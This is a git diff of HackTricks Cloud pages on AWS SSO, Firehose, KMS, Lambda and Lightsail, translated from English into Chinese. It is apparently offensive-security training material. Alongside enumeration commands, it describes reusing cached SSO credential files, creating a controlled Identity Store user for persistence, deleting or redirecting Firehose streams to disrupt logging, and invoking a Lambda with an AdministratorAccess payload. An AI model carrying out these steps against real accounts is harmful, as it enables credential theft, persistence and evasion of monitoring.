list-group-memberships-for-member --identity-store-id --member-id ``` - ### Local Enumeration -It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example: - +可以在文件夹 `$HOME/.aws` 内创建文件 config,以配置可以通过 SSO 访问的配置文件,例如: ```ini [default] region = us-west-2 @@ -343,20 +320,16 @@ output = json role_arn = arn:aws:iam:::role/ReadOnlyRole source_profile = Hacktricks-Admin ``` - -This configuration can be used with the commands: - +此配置可与以下命令一起使用: ```bash # Login in ms-sso-profile aws sso login --profile my-sso-profile # Use dependent-profile aws s3 ls --profile dependent-profile ``` +当使用 **SSO 的配置文件** 访问某些信息时,凭据会 **缓存** 在文件中,位于文件夹 **`$HOME/.aws/sso/cache`** 内。因此,它们可以 **从那里读取和使用**。 -When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**. - -Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). 
Config example: - +此外,**更多凭据** 可以存储在文件夹 **`$HOME/.aws/cli/cache`** 中。此缓存目录主要在您 **使用 AWS CLI 配置文件** 时使用,这些配置文件使用 IAM 用户凭据或通过 IAM **假设** 角色(不使用 SSO)。配置示例: ```ini [profile crossaccountrole] role_arn = arn:aws:iam::234567890123:role/SomeRole @@ -364,43 +337,36 @@ source_profile = default mfa_serial = arn:aws:iam::123456789012:mfa/saanvi external_id = 123456 ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md {{#endref}} -### Privilege Escalation +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md {{#endref}} -### Persistence - -#### Create a user an assign permissions to it +### 持久性 +#### 创建用户并为其分配权限 ```bash # Create user identitystore:CreateUser aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password ``` +- 创建一个组并分配权限,并设置一个受控用户 +- 给受控用户或组额外的权限 +- 默认情况下,只有来自管理账户的用户才能访问和控制 IAM 身份中心。 -- Create a group and assign it permissions and set on it a controlled user -- Give extra permissions to a controlled user or group -- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. - - However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). +然而,可以通过委派管理员允许来自不同账户的用户进行管理。他们将没有完全相同的权限,但他们将能够执行 [**管理活动**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md index 6ca66b5ed..b7e559e60 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md @@ -4,12 +4,11 @@ ## Kinesis Data Firehose -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. +Amazon Kinesis Data Firehose 是一个 **完全托管的服务**,便于 **实时流数据** 的交付。它支持多种目的地,包括 Amazon Simple Storage Service (Amazon S3)、Amazon Redshift、Amazon OpenSearch Service、Splunk 和自定义 HTTP 端点。 -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. 
+该服务通过允许数据生产者配置为直接将数据转发到 Kinesis Data Firehose,减轻了编写应用程序或管理资源的需求。该服务负责 **将数据自动交付到指定目的地**。此外,Kinesis Data Firehose 提供了 **在交付之前转换数据** 的选项,增强了其灵活性和适用性,以满足各种用例。 ### Enumeration - ```bash # Get delivery streams aws firehose list-delivery-streams @@ -19,37 +18,26 @@ aws firehose describe-delivery-stream --delivery-stream-name ## Get roles aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN ``` +## 后期利用 / 防御绕过 -## Post-exploitation / Defense Bypass - -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. +如果 firehose 被用来发送日志或防御洞察,攻击者可以利用这些功能来阻止其正常工作。 ### firehose:DeleteDeliveryStream - ``` aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete ``` - ### firehose:UpdateDestination - ``` aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id ``` - ### firehose:PutRecord | firehose:PutRecordBatch - ``` aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json ``` - -## References +## 参考 - [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md index 543ed31cd..e02a7cff7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -2,128 +2,125 @@ {{#include ../../../banners/hacktricks-training.md}} -## KMS - Key Management Service +## KMS - 密钥管理服务 -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. +AWS 密钥管理服务 (AWS KMS) 被呈现为一种托管服务,简化了用户**创建和管理客户主密钥** (CMK) 的过程。这些 CMK 在用户数据的加密中至关重要。AWS KMS 的一个显著特点是 CMK 主要由**硬件安全模块** (HSM) 保护,增强了加密密钥的保护。 -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. +KMS 使用**对称加密**。这用于**加密静态信息**(例如,在 S3 中)。如果您需要**加密传输中的信息**,则需要使用类似**TLS**的东西。 -KMS is a **region specific service**. +KMS 是一种**区域特定服务**。 -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. +**亚马逊的管理员无法访问您的密钥**。他们无法恢复您的密钥,也不会帮助您加密您的密钥。AWS 仅管理操作系统和底层应用程序,管理我们的加密密钥及其使用方式由我们自己负责。 -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. +**客户主密钥** (CMK):可以加密最大 4KB 的数据。它们通常用于创建、加密和解密 DEK(数据加密密钥)。然后使用 DEK 来加密数据。 -A customer master key (CMK) is a logical representation of a master key in AWS KMS. 
In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. +客户主密钥 (CMK) 是 AWS KMS 中主密钥的逻辑表示。除了主密钥的标识符和其他元数据(包括创建日期、描述和密钥状态)外,**CMK 包含用于加密和解密数据的密钥材料**。当您创建 CMK 时,默认情况下,AWS KMS 为该 CMK 生成密钥材料。然而,您可以选择创建没有密钥材料的 CMK,然后将自己的密钥材料导入该 CMK。 -There are 2 types of master keys: +有两种类型的主密钥: -- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. -- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. +- **AWS 管理的 CMK:由其他服务用于加密数据**。它由在区域中创建它的服务使用。它们在您首次在该服务中实现加密时创建。每 3 年轮换一次,无法更改。 +- **客户管理的 CMK**:灵活性、轮换、可配置的访问和密钥策略。启用和禁用密钥。 -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. +**信封加密**在密钥管理服务 (KMS) 的上下文中:两级层次系统,用于**用数据密钥加密数据,然后用主密钥加密数据密钥**。 -### Key Policies +### 密钥策略 -These defines **who can use and access a key in KMS**. +这些定义了**谁可以使用和访问 KMS 中的密钥**。 -By **default:** +**默认情况下:** -- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. +- 它授予**拥有 KMS 密钥的 AWS 账户的 IAM 访问**,以通过 IAM 管理对 KMS 密钥的访问。 - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. +与其他 AWS 资源策略不同,AWS **KMS 密钥策略不会自动授予账户的任何主体权限**。要授予账户管理员权限,**密钥策略必须包含提供此权限的明确声明**,如下所示。 - - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. +- 如果不允许账户(`"AWS": "arn:aws:iam::111122223333:root"`),IAM 权限将无效。 -- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. +- 它**允许账户使用 IAM 策略**来允许访问 KMS 密钥,除了密钥策略之外。 - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. +**没有此权限,允许访问密钥的 IAM 策略将无效**,尽管拒绝访问密钥的 IAM 策略仍然有效。 -- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: +- 它**通过向账户管理员(包括无法删除的账户根用户)授予访问控制权限,降低密钥变得不可管理的风险**。 +**默认策略**示例: ```json { - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" +"Sid": "Enable IAM policies", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::111122223333:root" +}, +"Action": "kms:*", +"Resource": "*" } ``` - > [!WARNING] -> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. 
+> 如果**账户被允许**(`"arn:aws:iam::111122223333:root"`),则该账户的**主体**仍然需要**IAM权限**才能使用KMS密钥。然而,如果某个角色的**ARN**在**密钥策略**中**被特别允许**,则该角色**不需要IAM权限**。
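So if you can edit the key policy, allowing a principal directly in it is enough for it to use the key without touching IAM. A minimal sketch with the CLI (the key ID and the role ARN are placeholders; `put-key-policy` replaces the whole policy document and requires `kms:PutKeyPolicy`):

```bash
aws kms put-key-policy --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
  --policy-name default --policy '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Enable IAM policies",
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::111122223333:root" },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Direct access for a specific role (no IAM policy needed)",
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::111122223333:role/SomeRole" },
      "Action": ["kms:Encrypt", "kms:Decrypt", "kms:DescribeKey"],
      "Resource": "*"
    }
  ]
}'
```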
-Policy Details +策略详情 -Properties of a policy: +策略的属性: -- JSON based document -- Resource --> Affected resources (can be "\*") -- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -- Effect --> Allow/Deny -- Principal --> arn affected -- Conditions (optional) --> Condition to give the permissions +- 基于JSON的文档 +- 资源 --> 受影响的资源(可以是"\*") +- 操作 --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ...(权限) +- 效果 --> 允许/拒绝 +- 主体 --> 受影响的arn +- 条件(可选) --> 授予权限的条件 -Grants: +授权: -- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -- After the grant is created a GrantToken and a GratID are issued +- 允许将您的权限委托给您AWS账户内的另一个AWS主体。您需要使用AWS KMS API创建它们。可以指明CMK标识符、受赠主体和所需的操作级别(解密、加密、生成数据密钥...) +- 授权创建后,会发出GrantToken和GrantID -**Access**: +**访问**: -- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -- Via **IAM policy** -- Via **grants** +- 通过**密钥策略** -- 如果存在此策略,则优先于IAM策略 +- 通过**IAM策略** +- 通过**授权**
-### Key Administrators +### 密钥管理员 -Key administrator by default: +默认的密钥管理员: -- Have access to manage KMS but not to encrypt or decrypt data -- Only IAM users and roles can be added to Key Administrators list (not groups) -- If external CMK is used, Key Administrators have the permission to import key material +- 有权管理KMS,但无权加密或解密数据 +- 只能将IAM用户和角色添加到密钥管理员列表中(不能是组) +- 如果使用外部CMK,密钥管理员有权限导入密钥材料 -### Rotation of CMKs +### CMK的轮换 -- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -- **Older keys are retained** to decrypt data that was encrypted prior to the rotation -- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. +- 同一密钥放置的时间越长,使用该密钥加密的数据就越多,如果该密钥被泄露,则数据的风险范围就越大。此外,密钥活动的时间越长,被泄露的概率就越高。 +- **KMS每365天轮换客户密钥**(或者您可以在任何时候手动执行此过程),**AWS管理的密钥每3年轮换一次**,且此时间无法更改。 +- **旧密钥被保留**以解密在轮换之前加密的数据 +- 在泄露的情况下,轮换密钥不会消除威胁,因为仍然可以解密所有使用被泄露密钥加密的数据。然而,**新数据将使用新密钥加密**。 +- 如果**CMK**处于**禁用**或**待删除**状态,KMS将**不执行密钥轮换**,直到CMK被重新启用或删除被取消。 -#### Manual rotation +#### 手动轮换 -- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -- You need to **keep old keys to decrypt old files** encrypted with it. +- 需要**创建一个新CMK**,然后创建一个新的CMK-ID,因此您需要**更新**任何**应用程序**以**引用**新的CMK-ID。 +- 为了简化此过程,您可以**使用别名引用密钥ID**,然后只需更新别名所指向的密钥。 +- 您需要**保留旧密钥以解密使用其加密的旧文件**。 -You can import keys from your on-premises key infrastructure . +您可以从您的本地密钥基础设施导入密钥。 -### Other relevant KMS information +### 其他相关KMS信息 -KMS is priced per number of encryption/decryption requests received from all services per month. +KMS按每月从所有服务接收的加密/解密请求数量定价。 -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. +KMS与CloudTrail有完整的审计和合规**集成**;在这里,您可以审计对KMS所做的所有更改。 -With KMS policy you can do the following: +使用KMS策略,您可以执行以下操作: -- Limit who can create data keys and which services have access to use these keys -- Limit systems access to encrypt only, decrypt only or both -- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). +- 限制谁可以创建数据密钥以及哪些服务可以使用这些密钥 +- 限制系统访问仅加密、仅解密或两者都可以 +- 定义使系统能够跨区域访问密钥(尽管不推荐,因为托管KMS的区域发生故障将影响其他区域系统的可用性)。 -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. 
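For the rotation behaviour described above, checking and enabling automatic rotation of a customer managed key is straightforward, and aliases make manual rotation painless. A sketch (the key ID, alias name and `$NEW_KEY_ID` are placeholders):

```bash
aws kms get-key-rotation-status --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
aws kms enable-key-rotation --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Manual rotation via an alias: repoint the alias to the newly created key
aws kms update-alias --alias-name alias/my-app-key --target-key-id $NEW_KEY_ID
```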
- -### Enumeration +您不能在区域之间同步或移动/复制密钥;您只能定义规则以允许跨区域访问。 +### 枚举 ```bash aws kms list-keys aws kms list-key-policies --key-id @@ -132,31 +129,26 @@ aws kms describe-key --key-id aws kms get-key-policy --key-id --policy-name # Default policy name is "default" aws kms describe-custom-key-stores ``` - -### Privesc +### 提权 {{#ref}} ../aws-privilege-escalation/aws-kms-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-kms-persistence.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index 03fa1aac8..0d423adf9 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -4,59 +4,58 @@ ## Lambda -Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations. +亚马逊网络服务(AWS)Lambda 被描述为一种 **计算服务**,使得在不需要服务器配置或管理的情况下执行代码成为可能。它的特点是能够 **自动处理代码执行所需的资源分配**,确保高可用性、可扩展性和安全性等特性。Lambda 的一个重要方面是其定价模型,**费用仅基于所使用的计算时间**,消除了初始投资或长期义务的需要。 -To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table. +要调用一个 lambda,可以 **随意调用**(使用 Cloudwatch),**暴露**一个 **URL** 端点并调用它,通过 **API Gateway** 调用,甚至基于 **事件**,例如 **S3** 存储桶中的数据 **更改** 或 **DynamoDB** 表的更新。 -The **code** of a lambda is stored in **`/var/task`**. +一个 lambda 的 **代码** 存储在 **`/var/task`** 中。 ### Lambda Aliases Weights -A Lambda can have **several versions**.\ -And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ -If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. +一个 Lambda 可以有 **多个版本**。\ +它可以通过 **别名** 暴露 **多个** 版本。每个别名中暴露的 **版本** 的 **权重** 将决定 **哪个别名接收调用**(例如可以是 90%-10%)。\ +如果 **一个** 别名的代码是 **脆弱的**,你可以发送 **请求,直到脆弱** 的版本接收到攻击。 ![](<../../../images/image (223).png>) ### Resource Policies -Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\ -For example this is the policy to allow **anyone to access a lambda exposed via URL**: +Lambda 资源策略允许 **授予其他服务/账户调用** lambda 的权限。\ +例如,这是允许 **任何人通过 URL 访问一个 lambda** 的策略:
-Or this to allow an API Gateway to invoke it: +或者这是允许 API Gateway 调用它的策略:
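Resource policies like the ones in the screenshots can be reviewed and extended from the CLI with `get-policy` / `add-permission`. A sketch (the function name, account ID and API Gateway ARN are placeholders):

```bash
# Dump the current resource policy of a function
aws lambda get-policy --function-name my-func

# Allow a specific API Gateway to invoke the function
aws lambda add-permission --function-name my-func \
  --statement-id apigw-invoke --action lambda:InvokeFunction \
  --principal apigateway.amazonaws.com \
  --source-arn "arn:aws:execute-api:us-east-1:123456789012:abcdef1234/*/*/*"

# Make an exposed function URL callable by anyone
aws lambda add-permission --function-name my-func \
  --statement-id public-url --action lambda:InvokeFunctionUrl \
  --principal "*" --function-url-auth-type NONE
```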
### Lambda Database Proxies -When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\ -Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation. +当有 **数百个** **并发的 lambda 请求** 时,如果每个请求都需要 **连接并关闭与数据库的连接**,这根本行不通(lambdas 是无状态的,无法保持连接打开)。\ +因此,如果你的 **Lambda 函数与 RDS Proxy 交互** 而不是与数据库实例交互。它处理并发 Lambda 函数创建的许多同时连接所需的连接池。这使得你的 Lambda 应用程序能够 **重用现有连接**,而不是为每个函数调用创建新连接。 ### Lambda EFS Filesystems -To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it. +为了保存甚至共享数据,**Lambdas 可以访问 EFS 并挂载它们**,这样 Lambda 就能够从中读取和写入。 ### Lambda Layers -A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +一个 Lambda _layer_ 是一个 .zip 文件归档,**可以包含额外的代码**或其他内容。一个 layer 可以包含库、[自定义运行时](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html)、数据或配置文件。 -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +每个函数最多可以包含 **五个层**。当你在一个函数中包含一个 layer 时,**内容会被提取到执行环境中的 `/opt`** 目录。 -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +默认情况下,你创建的 **layers** 是 **私有** 的,属于你的 AWS 账户。你可以选择 **与其他账户共享** 一个 layer 或 **将** 该 layer **公开**。如果你的函数使用了一个不同账户发布的 layer,你的函数可以 **在该 layer 被删除后,或在你被撤销访问该 layer 的权限后继续使用该 layer 版本**。但是,你不能使用已删除的 layer 版本创建新函数或更新函数。 -Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. +作为容器镜像部署的函数不使用 layers。相反,你在构建镜像时将所需的运行时、库和其他依赖项打包到容器镜像中。 ### Lambda Extensions -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. 
+Lambda 扩展通过与各种 **监控、可观察性、安全性和治理工具** 集成来增强函数。这些扩展通过 [.zip 归档使用 Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。 -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。 +- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作一致。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。 ### Enumeration - ```bash aws lambda get-account-settings @@ -93,11 +92,9 @@ aws lambda list-event-source-mappings aws lambda list-code-signing-configs aws lambda list-functions-by-code-signing-config --code-signing-config-arn ``` +### 调用一个 lambda -### Invoke a lambda - -#### Manual - +#### 手动 ```bash # Invoke function aws lambda invoke --function-name FUNCTION_NAME /tmp/out @@ -106,83 +103,70 @@ aws lambda invoke --function-name FUNCTION_NAME /tmp/out ## user_name = event['user_name'] aws lambda invoke --function-name --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt ``` - -#### Via exposed URL - +#### 通过暴露的 URL ```bash aws lambda list-function-url-configs --function-name #Get lambda URL aws lambda get-function-url-config --function-name #Get lambda URL ``` +#### 通过 URL 调用 Lambda 函数 -#### Call Lambda function via URL - -Now it's time to find out possible lambda functions to execute: - +现在是时候找出可以执行的可能的 lambda 函数了: ``` aws --region us-west-2 --profile level6 lambda list-functions ``` - ![](<../../../images/image (262).png>) -A lambda function called "Level6" is available. Lets find out how to call it: - +一个名为“Level6”的lambda函数可用。让我们找出如何调用它: ```bash aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 ``` - ![](<../../../images/image (102).png>) -Now, that you know the name and the ID you can get the Name: - +现在,您知道名称和ID后,可以获取名称: ```bash aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" ``` - ![](<../../../images/image (237).png>) -And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) +最后调用函数访问(注意ID、名称和函数名称出现在URL中): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) `URL:`**`https://.execute-api..amazonaws.com//`** -#### Other Triggers +#### 其他触发器 -There are a lot of other sources that can trigger a lambda +还有很多其他来源可以触发lambda
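For example, a scheduled EventBridge rule is one of the most common triggers; a rough sketch (rule name, region, account ID and ARNs are placeholders):

```bash
# Fire every 5 minutes and point the rule at the function
aws events put-rule --name invoke-my-function --schedule-expression "rate(5 minutes)"
aws events put-targets --rule invoke-my-function \
  --targets '[{"Id":"1","Arn":"arn:aws:lambda:us-east-1:123456789012:function:my-function"}]'
# The function also needs a resource policy allowing EventBridge to invoke it
aws lambda add-permission --function-name my-function \
  --statement-id AllowEventBridgeInvoke --action lambda:InvokeFunction \
  --principal events.amazonaws.com \
  --source-arn "arn:aws:events:us-east-1:123456789012:rule/invoke-my-function"
```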
-### Privesc +### 权限提升 -In the following page you can check how to **abuse Lambda permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用Lambda权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-lambda-privesc.md {{#endref}} -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/ {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-lambda-persistence/ {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md index 9f5ccb1ab..3af464cee 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md @@ -4,11 +4,10 @@ ## AWS - Lightsail -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. +Amazon Lightsail 提供了一种**简单**、轻量级的方式,让新的云用户能够利用 AWS 的云计算服务。它允许您通过 **VMs** (**EC2**) 和 **containers** 在几秒钟内部署常见和自定义的网络服务。\ +它是一个**最小的 EC2 + Route53 + ECS**。 ### Enumeration - ```bash # Instances aws lightsail get-instances #Get all @@ -29,35 +28,30 @@ aws lightsail get-load-balancers aws lightsail get-static-ips aws lightsail get-key-pairs ``` +### 分析快照 -### Analyse Snapshots +可以从 **lightsail** 生成 **实例和关系数据库快照**。因此,您可以像检查 [**EC2 